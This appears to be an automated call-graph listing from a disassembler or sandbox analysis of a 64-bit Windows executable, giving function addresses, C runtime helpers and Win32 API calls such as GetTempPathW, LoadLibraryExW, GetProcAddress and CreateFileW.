7ff6e5abffb3 15971->15973 15974 7ff6e5ac4444 _findclose 11 API calls 15972->15974 15976 7ff6e5abffc0 15973->15976 15979 7ff6e5abfffd 15973->15979 15975 7ff6e5abffa6 15974->15975 15977 7ff6e5ac9db0 _invalid_parameter_noinfo 37 API calls 15975->15977 15978 7ff6e5ac9ce4 _invalid_parameter_noinfo 37 API calls 15976->15978 15983 7ff6e5abffb1 15977->15983 15978->15983 15980 7ff6e5ac00a6 15979->15980 15981 7ff6e5ac4444 _findclose 11 API calls 15979->15981 15982 7ff6e5ac4444 _findclose 11 API calls 15980->15982 15980->15983 15984 7ff6e5ac009b 15981->15984 15985 7ff6e5ac0150 15982->15985 15983->15714 15986 7ff6e5ac9db0 _invalid_parameter_noinfo 37 API calls 15984->15986 15987 7ff6e5ac9db0 _invalid_parameter_noinfo 37 API calls 15985->15987 15986->15980 15987->15983 15989 7ff6e5ac3a5f 15988->15989 15990 7ff6e5accb79 15988->15990 15992 7ff6e5accbcc 15989->15992 15990->15989 15996 7ff6e5ad2424 15990->15996 15993 7ff6e5accbe5 15992->15993 15994 7ff6e5ac3a6f 15992->15994 15993->15994 16040 7ff6e5ad1790 15993->16040 15994->15714 16008 7ff6e5aca620 GetLastError 15996->16008 15999 7ff6e5ad247e 15999->15989 16009 7ff6e5aca644 FlsGetValue 16008->16009 16010 7ff6e5aca661 FlsSetValue 16008->16010 16011 7ff6e5aca65b 16009->16011 16027 7ff6e5aca651 16009->16027 16012 7ff6e5aca673 16010->16012 16010->16027 16011->16010 16014 7ff6e5acdd40 _findclose 11 API calls 16012->16014 16013 7ff6e5aca6cd SetLastError 16016 7ff6e5aca6da 16013->16016 16017 7ff6e5aca6ed 16013->16017 16015 7ff6e5aca682 16014->16015 16019 7ff6e5aca6a0 FlsSetValue 16015->16019 16020 7ff6e5aca690 FlsSetValue 16015->16020 16016->15999 16030 7ff6e5acf788 EnterCriticalSection 16016->16030 16031 7ff6e5ac920c 16017->16031 16023 7ff6e5aca6be 16019->16023 16024 7ff6e5aca6ac FlsSetValue 16019->16024 16022 7ff6e5aca699 16020->16022 16025 7ff6e5ac9e18 __free_lconv_mon 11 API calls 16022->16025 16026 7ff6e5aca3c4 _findclose 11 API calls 16023->16026 16024->16022 16025->16027 16028 7ff6e5aca6c6 16026->16028 16027->16013 16029 7ff6e5ac9e18 __free_lconv_mon 11 API calls 16028->16029 16029->16013 16032 7ff6e5ad2770 __GetCurrentState EnterCriticalSection LeaveCriticalSection 16031->16032 16033 7ff6e5ac9215 16032->16033 16034 7ff6e5ac9224 16033->16034 16035 7ff6e5ad27c0 __GetCurrentState 44 API calls 16033->16035 16036 7ff6e5ac922d IsProcessorFeaturePresent 16034->16036 16037 7ff6e5ac9257 __GetCurrentState 16034->16037 16035->16034 16038 7ff6e5ac923c 16036->16038 16039 7ff6e5ac9ae4 _wfindfirst32i64 14 API calls 16038->16039 16039->16037 16041 7ff6e5aca620 __GetCurrentState 45 API calls 16040->16041 16042 7ff6e5ad1799 16041->16042 16050 7ff6e5ac42ec EnterCriticalSection 16043->16050 16052 7ff6e5ab24ec 16051->16052 16053 7ff6e5ac3be4 49 API calls 16052->16053 16054 7ff6e5ab253f 16053->16054 16055 7ff6e5ac4444 _findclose 11 API calls 16054->16055 16056 7ff6e5ab2544 16055->16056 16070 7ff6e5ac4464 16056->16070 16059 7ff6e5ab1b30 49 API calls 16060 7ff6e5ab2573 __scrt_get_show_window_mode 16059->16060 16061 7ff6e5ab7a30 57 API calls 16060->16061 16062 7ff6e5ab25a0 16061->16062 16063 7ff6e5ab25df MessageBoxA 16062->16063 16064 7ff6e5ab25a5 16062->16064 16065 7ff6e5ab25f9 16063->16065 16066 7ff6e5ab7a30 57 API calls 16064->16066 16067 7ff6e5abad80 _wfindfirst32i64 8 API calls 16065->16067 16068 7ff6e5ab25bf MessageBoxW 16066->16068 16069 7ff6e5ab2609 16067->16069 16068->16065 16069->15339 16071 7ff6e5aca798 _findclose 11 API calls 16070->16071 16072 7ff6e5ac447b 16071->16072 16073 7ff6e5ab254b 16072->16073 16074 7ff6e5acdd40 _findclose 11 API calls 16072->16074 16077 7ff6e5ac44bb 16072->16077 16073->16059 16075 7ff6e5ac44b0 16074->16075 16076 7ff6e5ac9e18 __free_lconv_mon 11 API calls 16075->16076 16076->16077 16077->16073 16082 7ff6e5ace418 16077->16082 16080 7ff6e5ac9dd0 _wfindfirst32i64 17 API calls 16081 7ff6e5ac4500 16080->16081 16087 7ff6e5ace435 16082->16087 16083 7ff6e5ace43a 16084 7ff6e5ac44e1 16083->16084 16085 7ff6e5ac4444 _findclose 11 API calls 16083->16085 16084->16073 16084->16080 16086 7ff6e5ace444 16085->16086 16088 7ff6e5ac9db0 _invalid_parameter_noinfo 37 API calls 16086->16088 16087->16083 16087->16084 16089 7ff6e5ace484 16087->16089 16088->16084 16089->16084 16090 7ff6e5ac4444 _findclose 11 API calls 16089->16090 16090->16086 16092 7ff6e5ab7b64 WideCharToMultiByte 16091->16092 16093 7ff6e5ab7bd2 WideCharToMultiByte 16091->16093 16094 7ff6e5ab7b8e 16092->16094 16099 7ff6e5ab7ba5 16092->16099 16095 7ff6e5ab7bff 16093->16095 16098 7ff6e5ab3c05 16093->16098 16096 7ff6e5ab2620 57 API calls 16094->16096 16097 7ff6e5ab2620 57 API calls 16095->16097 16096->16098 16097->16098 16098->15348 16098->15351 16099->16093 16100 7ff6e5ab7bbb 16099->16100 16101 7ff6e5ab2620 57 API calls 16100->16101 16101->16098 16103 7ff6e5ac9123 16102->16103 16106 7ff6e5ab6a0e 16102->16106 16104 7ff6e5ac91ac __std_exception_copy 37 API calls 16103->16104 16103->16106 16105 7ff6e5ac9150 16104->16105 16105->16106 16107 7ff6e5ac9dd0 _wfindfirst32i64 17 API calls 16105->16107 16106->15369 16108 7ff6e5ac9180 16107->16108 16110 7ff6e5ab17e4 16109->16110 16111 7ff6e5ab17d4 16109->16111 16113 7ff6e5ab7200 83 API calls 16110->16113 16116 7ff6e5ab1842 16110->16116 16112 7ff6e5ab3cb0 116 API calls 16111->16112 16112->16110 16114 7ff6e5ab1815 16113->16114 16114->16116 16143 7ff6e5abf934 16114->16143 16118 7ff6e5abad80 _wfindfirst32i64 8 API calls 16116->16118 16117 7ff6e5ab182b 16119 7ff6e5ab182f 16117->16119 16120 7ff6e5ab184c 16117->16120 16121 7ff6e5ab19c0 16118->16121 16122 7ff6e5ab24d0 59 API calls 16119->16122 16147 7ff6e5abf5fc 16120->16147 16121->15383 16121->15385 16122->16116 16125 7ff6e5ab1867 16127 7ff6e5ab24d0 59 API calls 16125->16127 16126 7ff6e5abf934 73 API calls 16128 7ff6e5ab18d1 16126->16128 16127->16116 16129 7ff6e5ab18fe 16128->16129 16130 7ff6e5ab18e3 16128->16130 16132 7ff6e5abf5fc _fread_nolock 53 API calls 16129->16132 16131 7ff6e5ab24d0 59 API calls 16130->16131 16131->16116 16133 7ff6e5ab1913 16132->16133 16133->16125 16134 7ff6e5ab1925 16133->16134 16150 7ff6e5abf370 16134->16150 16137 7ff6e5ab193d 16139 7ff6e5ab2770 59 API calls 16137->16139 16138 7ff6e5ab1993 16138->16116 16141 7ff6e5abf2ac 74 API calls 16138->16141 16139->16116 16140 7ff6e5ab1950 16140->16138 16142 7ff6e5ab2770 59 API calls 16140->16142 16141->16116 16142->16138 16144 7ff6e5abf964 16143->16144 16156 7ff6e5abf6c4 16144->16156 16146 7ff6e5abf97d 16146->16117 16168 7ff6e5abf61c 16147->16168 16151 7ff6e5abf379 16150->16151 16152 7ff6e5ab1939 16150->16152 16153 7ff6e5ac4444 _findclose 11 API calls 16151->16153 16152->16137 16152->16140 16154 7ff6e5abf37e 16153->16154 16155 7ff6e5ac9db0 _invalid_parameter_noinfo 37 API calls 16154->16155 16155->16152 16157 7ff6e5abf72e 16156->16157 16158 7ff6e5abf6ee 16156->16158 16157->16158 16159 7ff6e5abf73a 16157->16159 16160 7ff6e5ac9ce4 _invalid_parameter_noinfo 37 API calls 16158->16160 16167 7ff6e5ac42ec EnterCriticalSection 16159->16167 16162 7ff6e5abf715 16160->16162 16162->16146 16169 7ff6e5ab1861 16168->16169 16170 7ff6e5abf646 16168->16170 16169->16125 16169->16126 16170->16169 16171 7ff6e5abf655 __scrt_get_show_window_mode 16170->16171 16172 7ff6e5abf692 16170->16172 16175 7ff6e5ac4444 _findclose 11 API calls 16171->16175 16181 7ff6e5ac42ec EnterCriticalSection 16172->16181 16177 7ff6e5abf66a 16175->16177 16179 7ff6e5ac9db0 _invalid_parameter_noinfo 37 API calls 16177->16179 16179->16169 16275 7ff6e5ab6720 16182->16275 16184 7ff6e5ab1454 16185 7ff6e5ab1459 16184->16185 16284 7ff6e5ab6a40 16184->16284 16185->15413 16188 7ff6e5ab14a7 16191 7ff6e5ab14e0 16188->16191 16194 7ff6e5ab3cb0 116 API calls 16188->16194 16189 7ff6e5ab1487 16190 7ff6e5ab24d0 59 API calls 16189->16190 16193 7ff6e5ab149d 16190->16193 16192 7ff6e5abf934 73 API calls 16191->16192 16195 7ff6e5ab14f2 16192->16195 16193->15413 16196 7ff6e5ab14bf 16194->16196 16198 7ff6e5ab1516 16195->16198 16199 7ff6e5ab14f6 16195->16199 16196->16191 16197 7ff6e5ab14c7 16196->16197 16200 7ff6e5ab2770 59 API calls 16197->16200 16202 7ff6e5ab1534 16198->16202 16203 7ff6e5ab151c 16198->16203 16201 7ff6e5ab24d0 59 API calls 16199->16201 16210 7ff6e5ab14d6 __std_exception_copy 16200->16210 16201->16210 16205 7ff6e5ab1556 16202->16205 16215 7ff6e5ab1575 16202->16215 16309 7ff6e5ab1050 16203->16309 16207 7ff6e5ab24d0 59 API calls 16205->16207 16206 7ff6e5ab1624 16209 7ff6e5abf2ac 74 API calls 16206->16209 16207->16210 16208 7ff6e5abf2ac 74 API calls 16208->16206 16209->16193 16210->16206 16210->16208 16211 7ff6e5abf5fc _fread_nolock 53 API calls 16211->16215 16212 7ff6e5ab15d5 16214 7ff6e5ab24d0 59 API calls 16212->16214 16214->16210 16215->16210 16215->16211 16215->16212 16327 7ff6e5abfd3c 16215->16327 16217 7ff6e5ab29a6 16216->16217 16218 7ff6e5ab1b30 49 API calls 16217->16218 16219 7ff6e5ab29db 16218->16219 16220 7ff6e5ab3b20 49 API calls 16219->16220 16249 7ff6e5ab2de1 16219->16249 16221 7ff6e5ab2a4f 16220->16221 16897 7ff6e5ab2e00 16221->16897 16224 7ff6e5ab2a91 16226 7ff6e5ab6720 98 API calls 16224->16226 16225 7ff6e5ab2aca 16227 7ff6e5ab2e00 75 API calls 16225->16227 16228 7ff6e5ab2a99 16226->16228 16229 7ff6e5ab2b1c 16227->16229 16230 7ff6e5ab2aba 16228->16230 16905 7ff6e5ab6600 16228->16905 16231 7ff6e5ab2b20 16229->16231 16232 7ff6e5ab2b86 16229->16232 16233 7ff6e5ab2770 59 API calls 16230->16233 16237 7ff6e5ab2ac3 16230->16237 16236 7ff6e5ab6720 98 API calls 16231->16236 16235 7ff6e5ab2e00 75 API calls 16232->16235 16233->16237 16238 7ff6e5ab2bb2 16235->16238 16239 7ff6e5ab2b28 16236->16239 16243 7ff6e5abad80 _wfindfirst32i64 8 API calls 16237->16243 16240 7ff6e5ab2c12 16238->16240 16244 7ff6e5ab2e00 75 API calls 16238->16244 16239->16230 16241 7ff6e5ab6600 138 API calls 16239->16241 16240->16249 16246 7ff6e5ab2b7b 16243->16246 16246->15413 16272 7ff6e5ab1795 16271->16272 16274 7ff6e5ab17a1 16271->16274 16273 7ff6e5ab2770 59 API calls 16272->16273 16273->16274 16274->15413 16276 7ff6e5ab6768 16275->16276 16277 7ff6e5ab6732 16275->16277 16276->16184 16331 7ff6e5ab16d0 16277->16331 16285 7ff6e5ab6a50 16284->16285 16286 7ff6e5ab1b30 49 API calls 16285->16286 16287 7ff6e5ab6a81 16286->16287 16288 7ff6e5ab6c4b 16287->16288 16289 7ff6e5ab1b30 49 API calls 16287->16289 16290 7ff6e5abad80 _wfindfirst32i64 8 API calls 16288->16290 16292 7ff6e5ab6aa8 16289->16292 16291 7ff6e5ab147f 16290->16291 16291->16188 16291->16189 16292->16288 16847 7ff6e5ac50e8 16292->16847 16294 7ff6e5ab6bb9 16295 7ff6e5ab7a30 57 API calls 16294->16295 16297 7ff6e5ab6bd1 16295->16297 16296 7ff6e5ab6c7a 16297->16296 16301 7ff6e5ab6990 61 API calls 16297->16301 16302 7ff6e5ab6c02 __std_exception_copy 16297->16302 16301->16302 16304 7ff6e5ab6add 16304->16288 16304->16294 16306 7ff6e5ac50e8 49 API calls 16304->16306 16307 7ff6e5ab7a30 57 API calls 16304->16307 16308 7ff6e5ab78a0 58 API calls 16304->16308 16306->16304 16307->16304 16308->16304 16310 7ff6e5ab10a6 16309->16310 16311 7ff6e5ab10ad 16310->16311 16313 7ff6e5ab10d3 16310->16313 16312 7ff6e5ab2770 59 API calls 16311->16312 16315 7ff6e5ab1109 16313->16315 16316 7ff6e5ab10ed 16313->16316 16328 7ff6e5abfd6c 16327->16328 16882 7ff6e5abfa8c 16328->16882 16332 7ff6e5ab16f5 16331->16332 16333 7ff6e5ab1738 16332->16333 16334 7ff6e5ab2770 59 API calls 16332->16334 16335 7ff6e5ab6780 16333->16335 16334->16333 16336 7ff6e5ab6798 16335->16336 16337 7ff6e5ab67b8 16336->16337 16338 7ff6e5ab680b 16336->16338 16340 7ff6e5ab6990 61 API calls 16337->16340 16339 7ff6e5ab6810 GetTempPathW 16338->16339 16341 7ff6e5ab6825 16339->16341 16342 7ff6e5ab67c4 16340->16342 16375 7ff6e5ab2470 16341->16375 16399 7ff6e5ab6480 16342->16399 16353 7ff6e5ab683e __std_exception_copy 16370 7ff6e5ab68aa __std_exception_copy 16376 7ff6e5ab2495 16375->16376 16433 7ff6e5ac3e38 16376->16433 16400 7ff6e5ab648c 16399->16400 16401 7ff6e5ab7a30 57 API calls 16400->16401 16402 7ff6e5ab64ae 16401->16402 16403 7ff6e5ab64c9 ExpandEnvironmentStringsW 16402->16403 16404 7ff6e5ab64b6 16402->16404 16406 7ff6e5ab64ef __std_exception_copy 16403->16406 16405 7ff6e5ab2770 59 API calls 16404->16405 16412 7ff6e5ab64c2 16405->16412 16407 7ff6e5ab64f3 16406->16407 16408 7ff6e5ab6506 16406->16408 16410 7ff6e5ab2770 59 API calls 16407->16410 16413 7ff6e5ab6520 16408->16413 16414 7ff6e5ab6514 16408->16414 16409 7ff6e5abad80 _wfindfirst32i64 8 API calls 16411 7ff6e5ab65e8 16409->16411 16410->16412 16411->16370 16423 7ff6e5ac66b4 16411->16423 16412->16409 16747 7ff6e5ac5348 16413->16747 16740 7ff6e5ac5f44 16414->16740 16434 7ff6e5ac3e92 16433->16434 16435 7ff6e5ac3eb7 16434->16435 16437 7ff6e5ac3ef3 16434->16437 16436 7ff6e5ac9ce4 _invalid_parameter_noinfo 37 API calls 16435->16436 16439 7ff6e5ac3ee1 16436->16439 16451 7ff6e5ac21f0 16437->16451 16441 7ff6e5abad80 _wfindfirst32i64 8 API calls 16439->16441 16444 7ff6e5ab24b4 16441->16444 16443 7ff6e5ac3fd4 16444->16353 16445 7ff6e5ac3fa9 16446 7ff6e5ac3ffa 16446->16443 16449 7ff6e5ac3fa0 16449->16443 16449->16445 16452 7ff6e5ac222e 16451->16452 16453 7ff6e5ac221e 16451->16453 16454 7ff6e5ac2237 16452->16454 16458 7ff6e5ac2265 16452->16458 16455 7ff6e5ac9ce4 _invalid_parameter_noinfo 37 API calls 16453->16455 16456 7ff6e5ac9ce4 _invalid_parameter_noinfo 37 API calls 16454->16456 16457 7ff6e5ac225d 16455->16457 16456->16457 16457->16443 16457->16445 16457->16446 16457->16449 16458->16453 16458->16457 16462 7ff6e5ac2c04 16458->16462 16495 7ff6e5ac2650 16458->16495 16532 7ff6e5ac1de0 16458->16532 16588 7ff6e5ac0228 16532->16588 16848 7ff6e5aca620 __GetCurrentState 45 API calls 16847->16848 16850 7ff6e5ac50fd 16848->16850 16849 7ff6e5acee97 16869 7ff6e5abaf14 16849->16869 16850->16849 16855 7ff6e5acedb6 16850->16855 16853 7ff6e5abad80 _wfindfirst32i64 8 API calls 16854 7ff6e5acee8f 16853->16854 16854->16304 16855->16853 16872 7ff6e5abaf28 IsProcessorFeaturePresent 16869->16872 16873 7ff6e5abaf3f 16872->16873 16878 7ff6e5abafc4 RtlCaptureContext RtlLookupFunctionEntry 16873->16878 16879 7ff6e5abaff4 RtlVirtualUnwind 16878->16879 16880 7ff6e5abaf53 16878->16880 16879->16880 16881 7ff6e5abae00 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 16880->16881 16898 7ff6e5ab2e34 16897->16898 16899 7ff6e5ac3be4 49 API calls 16898->16899 16900 7ff6e5ab2e5a 16899->16900 16901 7ff6e5ab2e6b 16900->16901 16929 7ff6e5ac4e08 16900->16929 16903 7ff6e5abad80 _wfindfirst32i64 8 API calls 16901->16903 16904 7ff6e5ab2a8d 16903->16904 16904->16224 16904->16225 16906 7ff6e5ab660e 16905->16906 16907 7ff6e5ab3cb0 116 API calls 16906->16907 16908 7ff6e5ab6635 16907->16908 16909 7ff6e5ab6a40 136 API calls 16908->16909 16930 7ff6e5ac4e31 16929->16930 16931 7ff6e5ac4e25 16929->16931 16971 7ff6e5ac4a1c 16930->16971 16946 7ff6e5ac4680 16931->16946 16937 7ff6e5ac4e69 16982 7ff6e5ac4504 16937->16982 16939 7ff6e5ac4ec5 16941 7ff6e5ac4e2a 16939->16941 16943 7ff6e5ac9e18 __free_lconv_mon 11 API calls 16939->16943 16940 7ff6e5ac4ed9 16942 7ff6e5ac4680 69 API calls 16940->16942 16941->16901 16944 7ff6e5ac4ee5 16942->16944 16943->16941 16944->16941 16947 7ff6e5ac46b7 16946->16947 16948 7ff6e5ac469a 16946->16948 16947->16948 16950 7ff6e5ac46ca CreateFileW 16947->16950 16949 7ff6e5ac4424 _fread_nolock 11 API calls 16948->16949 16953 7ff6e5ac469f 16949->16953 16951 7ff6e5ac46fe 16950->16951 16952 7ff6e5ac4734 16950->16952 17004 7ff6e5ac47d4 GetFileType 16951->17004 17030 7ff6e5ac4cf8 16952->17030 16956 7ff6e5ac4444 _findclose 11 API calls 16953->16956 16959 7ff6e5ac46a7 16956->16959 16964 7ff6e5ac9db0 _invalid_parameter_noinfo 37 API calls 16959->16964 16965 7ff6e5ac46b2 16964->16965 16965->16941 16972 7ff6e5ac4a40 16971->16972 16978 7ff6e5ac4a3b 16971->16978 16973 7ff6e5aca620 __GetCurrentState 45 API calls 16972->16973 16972->16978 16974 7ff6e5ac4a5b 16973->16974 17092 7ff6e5accb2c 16974->17092 16978->16937 16979 7ff6e5acdfcc 16978->16979 17100 7ff6e5acddb8 16979->17100 16983 7ff6e5ac452e 16982->16983 16984 7ff6e5ac4552 16982->16984 16988 7ff6e5ac9e18 __free_lconv_mon 11 API calls 16983->16988 16992 7ff6e5ac453d 16983->16992 16985 7ff6e5ac4557 16984->16985 16986 7ff6e5ac45ac 16984->16986 16989 7ff6e5ac456c 16985->16989 16985->16992 16993 7ff6e5ac9e18 __free_lconv_mon 11 API calls 16985->16993 17110 7ff6e5ace7f0 16986->17110 16988->16992 16990 7ff6e5accacc _fread_nolock 12 API calls 16989->16990 16990->16992 16992->16939 16992->16940 16993->16989 17005 7ff6e5ac48df 17004->17005 17006 7ff6e5ac4822 17004->17006 17008 7ff6e5ac4909 17005->17008 17009 7ff6e5ac48e7 17005->17009 17007 7ff6e5ac484e GetFileInformationByHandle 17006->17007 17011 7ff6e5ac4bf4 21 API calls 17006->17011 17012 7ff6e5ac4877 17007->17012 17013 7ff6e5ac48fa GetLastError 17007->17013 17010 7ff6e5ac492c PeekNamedPipe 17008->17010 17029 7ff6e5ac48ca 17008->17029 17009->17013 17014 7ff6e5ac48eb 17009->17014 17010->17029 17016 7ff6e5ac483c 17011->17016 17016->17007 17016->17029 17020 7ff6e5abad80 _wfindfirst32i64 8 API calls 17029->17020 17031 7ff6e5ac4d2e 17030->17031 17032 7ff6e5ac4dc6 __std_exception_copy 17031->17032 17033 7ff6e5ac4444 _findclose 11 API calls 17031->17033 17034 7ff6e5abad80 _wfindfirst32i64 8 API calls 17032->17034 17035 7ff6e5ac4d40 17033->17035 17037 7ff6e5ac4739 17034->17037 17036 7ff6e5ac4444 _findclose 11 API calls 17035->17036 17093 7ff6e5accb41 17092->17093 17094 7ff6e5ac4a7e 17092->17094 17093->17094 17095 7ff6e5ad2424 45 API calls 17093->17095 17096 7ff6e5accb98 17094->17096 17095->17094 17097 7ff6e5accbc0 17096->17097 17098 7ff6e5accbad 17096->17098 17097->16978 17098->17097 17099 7ff6e5ad1790 45 API calls 17098->17099 17099->17097 17101 7ff6e5acde15 17100->17101 17108 7ff6e5acde10 __vcrt_InitializeCriticalSectionEx 17100->17108 17101->16937 17102 7ff6e5acde45 LoadLibraryW 17104 7ff6e5acdf1a 17102->17104 17105 7ff6e5acde6a GetLastError 17102->17105 17103 7ff6e5acdf3a GetProcAddress 17103->17101 17107 7ff6e5acdf4b 17103->17107 17104->17103 17106 7ff6e5acdf31 FreeLibrary 17104->17106 17105->17108 17106->17103 17107->17101 17108->17101 17108->17102 17108->17103 17109 7ff6e5acdea4 LoadLibraryExW 17108->17109 17109->17104 17109->17108 17111 7ff6e5ace7f9 MultiByteToWideChar 17110->17111 17140 7ff6e5ab707a 17139->17140 17141 7ff6e5ac918d 17139->17141 17196 7ff6e5ac53fc 17195->17196 17197 7ff6e5ac5422 17196->17197 17200 7ff6e5ac5455 17196->17200 17198 7ff6e5ac4444 _findclose 11 API calls 17197->17198 17199 7ff6e5ac5427 17198->17199 17201 7ff6e5ac9db0 _invalid_parameter_noinfo 37 API calls 17199->17201 17202 7ff6e5ac5468 17200->17202 17203 7ff6e5ac545b 17200->17203 17206 7ff6e5ab3d09 17201->17206 17214 7ff6e5aca0f8 17202->17214 17204 7ff6e5ac4444 _findclose 11 API calls 17203->17204 17204->17206 17206->15489 17227 7ff6e5acf788 EnterCriticalSection 17214->17227 17575 7ff6e5ac7968 17574->17575 17578 7ff6e5ac7444 17575->17578 17577 7ff6e5ac7981 17577->15499 17579 7ff6e5ac745f 17578->17579 17580 7ff6e5ac748e 17578->17580 17582 7ff6e5ac9ce4 _invalid_parameter_noinfo 37 API calls 17579->17582 17588 7ff6e5ac42ec EnterCriticalSection 17580->17588 17584 7ff6e5ac747f 17582->17584 17584->17577 17590 7ff6e5abf0a3 17589->17590 17592 7ff6e5abf0d1 17589->17592 17591 7ff6e5ac9ce4 _invalid_parameter_noinfo 37 API calls 17590->17591 17593 7ff6e5abf0c3 17591->17593 17592->17593 17599 7ff6e5ac42ec EnterCriticalSection 17592->17599 17593->15503 17601 7ff6e5ab12f8 17600->17601 17602 7ff6e5ab12c6 17600->17602 17604 7ff6e5abf934 73 API calls 17601->17604 17603 7ff6e5ab3cb0 116 API calls 17602->17603 17605 7ff6e5ab12d6 17603->17605 17606 7ff6e5ab130a 17604->17606 17605->17601 17607 7ff6e5ab12de 17605->17607 17608 7ff6e5ab130e 17606->17608 17609 7ff6e5ab132f 17606->17609 17610 7ff6e5ab2770 59 API calls 17607->17610 17611 7ff6e5ab24d0 59 API calls 17608->17611 17614 7ff6e5ab1364 17609->17614 17615 7ff6e5ab1344 17609->17615 17612 7ff6e5ab12ee 17610->17612 17613 7ff6e5ab1325 17611->17613 17612->15514 17613->15514 17617 7ff6e5ab137e 17614->17617 17622 7ff6e5ab1395 17614->17622 17616 7ff6e5ab24d0 59 API calls 17615->17616 17623 7ff6e5ab135f __std_exception_copy 17616->17623 17618 7ff6e5ab1050 98 API calls 17617->17618 17618->17623 17619 7ff6e5ab1421 17619->15514 17620 7ff6e5abf5fc _fread_nolock 53 API calls 17620->17622 17621 7ff6e5abf2ac 74 API calls 17621->17619 17622->17620 17622->17623 17624 7ff6e5ab13de 17622->17624 17623->17619 17623->17621 17625 7ff6e5ab24d0 59 API calls 17624->17625 17625->17623 17627 7ff6e5ab1b30 49 API calls 17626->17627 17628 7ff6e5ab3d60 17627->17628 17628->15516 17630 7ff6e5ab1666 17629->17630 17631 7ff6e5ab16aa 17629->17631 17630->17631 17632 7ff6e5ab2770 59 API calls 17630->17632 17631->15532 17633 7ff6e5ab16be 17632->17633 17633->15532 17635 7ff6e5ab7a30 57 API calls 17634->17635 17636 7ff6e5ab71c7 LoadLibraryExW 17635->17636 17637 7ff6e5ab71e4 __std_exception_copy 17636->17637 17637->15540 17639 7ff6e5ab4970 17638->17639 17640 7ff6e5ab1b30 49 API calls 17639->17640 17641 7ff6e5ab49a2 17640->17641 17642 7ff6e5ab49cb 17641->17642 17643 7ff6e5ab49ab 17641->17643 17645 7ff6e5ab4a22 17642->17645 17647 7ff6e5ab3d30 49 API calls 17642->17647 17644 7ff6e5ab2770 59 API calls 17643->17644 17665 7ff6e5ab49c1 17644->17665 17646 7ff6e5ab3d30 49 API calls 17645->17646 17648 7ff6e5ab4a3b 17646->17648 17649 7ff6e5ab49ec 17647->17649 17650 7ff6e5ab4a59 17648->17650 17653 7ff6e5ab2770 59 API calls 17648->17653 17651 7ff6e5ab4a0a 17649->17651 17655 7ff6e5ab2770 59 API calls 17649->17655 17654 7ff6e5ab71b0 58 API calls 17650->17654 17723 7ff6e5ab3c40 17651->17723 17652 7ff6e5abad80 _wfindfirst32i64 8 API calls 17657 7ff6e5ab30be 17652->17657 17653->17650 17658 7ff6e5ab4a66 17654->17658 17655->17651 17657->15619 17666 7ff6e5ab4ce0 17657->17666 17660 7ff6e5ab4a8d 17658->17660 17661 7ff6e5ab4a6b 17658->17661 17729 7ff6e5ab3df0 GetProcAddress 17660->17729 17662 7ff6e5ab2620 57 API calls 17661->17662 17662->17665 17664 7ff6e5ab71b0 58 API calls 17664->17645 17665->17652 17667 7ff6e5ab6990 61 API calls 17666->17667 17668 7ff6e5ab4cf5 17667->17668 17669 7ff6e5ab4d10 17668->17669 17671 7ff6e5ab2880 59 API calls 17668->17671 17670 7ff6e5ab7a30 57 API calls 17669->17670 17672 7ff6e5ab4d54 17670->17672 17671->17669 17673 7ff6e5ab4d70 17672->17673 17674 7ff6e5ab4d59 17672->17674 17677 7ff6e5ab7a30 57 API calls 17673->17677 17675 7ff6e5ab2770 59 API calls 17674->17675 17676 7ff6e5ab4d65 17675->17676 17676->15621 17678 7ff6e5ab4da5 17677->17678 17680 7ff6e5ab1b30 49 API calls 17678->17680 17692 7ff6e5ab4daa __std_exception_copy 17678->17692 17679 7ff6e5ab2770 59 API calls 17681 7ff6e5ab4f51 17679->17681 17682 7ff6e5ab4e27 17680->17682 17681->15621 17683 7ff6e5ab4e2e 17682->17683 17684 7ff6e5ab4e53 17682->17684 17692->17679 17693 7ff6e5ab4f3a 17692->17693 17693->15621 17695 7ff6e5ab46f7 17694->17695 17695->17695 17724 7ff6e5ab3c4a 17723->17724 17725 7ff6e5ab7a30 57 API calls 17724->17725 17726 7ff6e5ab3c72 17725->17726 17727 7ff6e5abad80 _wfindfirst32i64 8 API calls 17726->17727 17728 7ff6e5ab3c9a 17727->17728 17728->17645 17728->17664 17730 7ff6e5ab3e18 17729->17730 17731 7ff6e5ab3e3b GetProcAddress 17729->17731 17733 7ff6e5ab2620 57 API calls 17730->17733 17731->17730 17732 7ff6e5ab3e60 GetProcAddress 17731->17732 17732->17730 17734 7ff6e5ab3e85 GetProcAddress 17732->17734 17735 7ff6e5ab3e2b 17733->17735 17734->17730 17736 7ff6e5ab3ead GetProcAddress 17734->17736 17735->17665 17736->17730 17737 7ff6e5ab3ed5 GetProcAddress 17736->17737 17737->17730 17738 7ff6e5ab3efd GetProcAddress 17737->17738 17739 7ff6e5ab3f25 GetProcAddress 17738->17739 17740 7ff6e5ab3f19 17738->17740 17740->17739 17968 7ff6e5aca620 __GetCurrentState 45 API calls 17967->17968 17969 7ff6e5ac90e1 17968->17969 17970 7ff6e5ac920c __GetCurrentState 45 API calls 17969->17970 17971 7ff6e5ac9101 17970->17971 14899 7ff6e5ac6714 14900 7ff6e5ac6742 14899->14900 14901 7ff6e5ac677b 14899->14901 14903 7ff6e5ac4444 _findclose 11 API calls 14900->14903 14901->14900 14902 7ff6e5ac6780 FindFirstFileExW 14901->14902 14904 7ff6e5ac67a2 GetLastError 14902->14904 14905 7ff6e5ac67e9 14902->14905 14906 7ff6e5ac6747 14903->14906 14908 7ff6e5ac67d9 14904->14908 14909 7ff6e5ac67ad 14904->14909 14959 7ff6e5ac6984 14905->14959 14910 7ff6e5ac9db0 _invalid_parameter_noinfo 37 API calls 14906->14910 14912 7ff6e5ac4444 _findclose 11 API calls 14908->14912 14909->14908 14915 7ff6e5ac67c9 14909->14915 14916 7ff6e5ac67b7 14909->14916 14911 7ff6e5ac6752 14910->14911 14917 7ff6e5abad80 _wfindfirst32i64 8 API calls 14911->14917 14912->14911 14914 7ff6e5ac6984 _wfindfirst32i64 10 API calls 14918 7ff6e5ac680f 14914->14918 14920 7ff6e5ac4444 _findclose 11 API calls 14915->14920 14916->14908 14919 7ff6e5ac67bc 14916->14919 14921 7ff6e5ac6766 14917->14921 14922 7ff6e5ac6984 _wfindfirst32i64 10 API calls 14918->14922 14923 7ff6e5ac4444 _findclose 11 API calls 14919->14923 14920->14911 14924 7ff6e5ac681d 14922->14924 14923->14911 14925 7ff6e5acf924 _wfindfirst32i64 37 API calls 14924->14925 14926 7ff6e5ac683b 14925->14926 14926->14911 14927 7ff6e5ac6847 14926->14927 14928 7ff6e5ac9dd0 _wfindfirst32i64 17 API calls 14927->14928 14929 7ff6e5ac685b 14928->14929 14930 7ff6e5ac6885 14929->14930 14933 7ff6e5ac68c4 